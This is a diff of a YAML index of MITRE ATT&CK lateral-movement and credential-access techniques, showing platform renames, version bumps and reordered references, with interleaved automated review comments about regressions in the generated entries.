Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
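Review bot: possible loss of T1056.004's detection guidance at the removed `x_mitre_detection: |-` block: the hooking detection text (SetWindowsHookEx/SetWinEventHook monitoring, hook-chain inspection, in-memory IAT comparison) and the `credential-access` kill-chain phase are deleted, and no added line in this hunk re-emits them. The relocated T1056.004 entry visible above ends with its external references, `x_mitre_attack_spec_version: 3.2.0`, `identifier: T1056.004` and `atomic_tests: []`, and the only detection field added here is the empty `x_mitre_detection: ''` of the new T1213.005 entry. Because the unchanged `phase_name: collection` context line is now shared by the old T1056.004 tail and the new T1213.005 head, the mapping is easy to misread; please confirm the regenerated T1056.004 entry still carries both phases and its detection text, and consider generating with per-technique ordering so moved entries do not interleave in the diff. Separately, T1213.005 lands with `x_mitre_detection: ''` and `atomic_tests: []`, i.e. a new collection technique indexed with neither detection guidance nor a test, which is worth calling out in the changelog.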
@@ -41634,6 +42321,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41643,7 +42331,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41659,66 +42346,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
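Review bot: the reference reorder hides the only substantive changes in this hunk: the `Havana authentication bug` entry switches to https and a September 12, 2024 retrieval date, `revoked: false` is added, `spec_version: '2.1'` is dropped and `x_mitre_attack_spec_version` moves to 3.2.0 with `x_mitre_modified_by_ref` placed after it; the remaining several dozen changed lines are the same references emitted in a different order. If the generator preserves upstream STIX order, sorting `external_references` by `source_name` (after the `mitre-attack` entry) would keep future diffs reviewable. Minor: `RealVNC Ltd..` in the RFC 6143 reference carries a doubled period inherited from upstream.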
@@ -41743,11 +42431,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
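Review bot: the platform rename at `- Office 365` / `+ - Office Suite` (with the version bump to 1.5) is repeated in the later platform lists of this patch, where `Azure AD` and `Google Workspace` also disappear in favour of `Identity Provider` and `Office Suite`. Any tooling or index filter still keyed on the old platform strings will return empty results for these techniques after this change; if this repository emits per-platform index files, they should be regenerated or renamed in the same commit, and the new `Office Suite` entry is appended at the end of the list rather than in the old entry's position, so consumers that diff platform lists positionally will see every entry move.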
@@ -41770,9 +42458,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -41823,7 +42510,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -41887,7 +42573,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -41958,7 +42643,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -41995,7 +42679,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
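Review bot: the `modified` timestamp for T1563.001 moves backwards at `- modified: '2021-04-29...'` / `+ modified: '2020-03-23...'`, while every other technique in this patch moves forward to a 2024 date. A regenerated entry should not receive an older modification time than the one it replaces; this points to the generator having picked up a stale or superseded STIX object for SSH Hijacking. Please check which upstream object this entry was built from before merging.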
@@ -42026,8 +42710,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
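Review bot: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1563.001 without the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines that the other regenerated entries receive, so this entry ends up with no attack-spec version at all. Together with the backwards `modified` date in the previous hunk, this looks like the entry was built from a different (older) source object; either add the 3.2.0 line or confirm the source bundle is the intended one.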
@@ -42110,12 +42792,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -42142,6 +42823,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42159,12 +42841,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -42190,14 +42872,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -42315,7 +42996,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -42369,11 +43049,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42425,14 +43104,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42518,12 +43196,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42543,6 +43220,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42550,7 +43228,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42566,39 +43243,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
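Review bot: the `GentilKiwi Pass the Ticket` reference now points at a Wayback Machine snapshot (`web.archive.org/web/20210515214027/...`) instead of the live blog, with the retrieval date reset to September 12, 2024. That is the right fix for a dead link, but archived URLs should be flagged in the source metadata (or in the commit message) so a later link check does not treat the snapshot as a live page; the rest of this hunk is the same five references in a different order plus the `revoked: false` and spec-version lines.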
@@ -42623,12 +43301,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42642,13 +43319,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42665,7 +43341,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42713,7 +43389,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42746,7 +43422,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42785,7 +43460,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42819,12 +43494,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
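Review bot: as with T1563.001 earlier in this patch, T1210 loses `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place, and its `modified` date in the previous hunk moves backwards (2022-05-11 to 2022-02-24). Two entries showing the same regression suggest a source-selection issue in the generator rather than a one-off; please verify how the object for a given external_id is chosen and regenerate these two entries so they carry the 3.2.0 spec line like the rest.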
@@ -42852,10 +43525,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -42885,7 +43557,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -42947,12 +43618,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42976,11 +43646,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -43005,9 +43674,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -43067,7 +43735,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -43122,7 +43789,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -43190,12 +43856,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -43252,6 +43917,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43262,13 +43928,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -43327,7 +43992,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43421,49 +44085,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
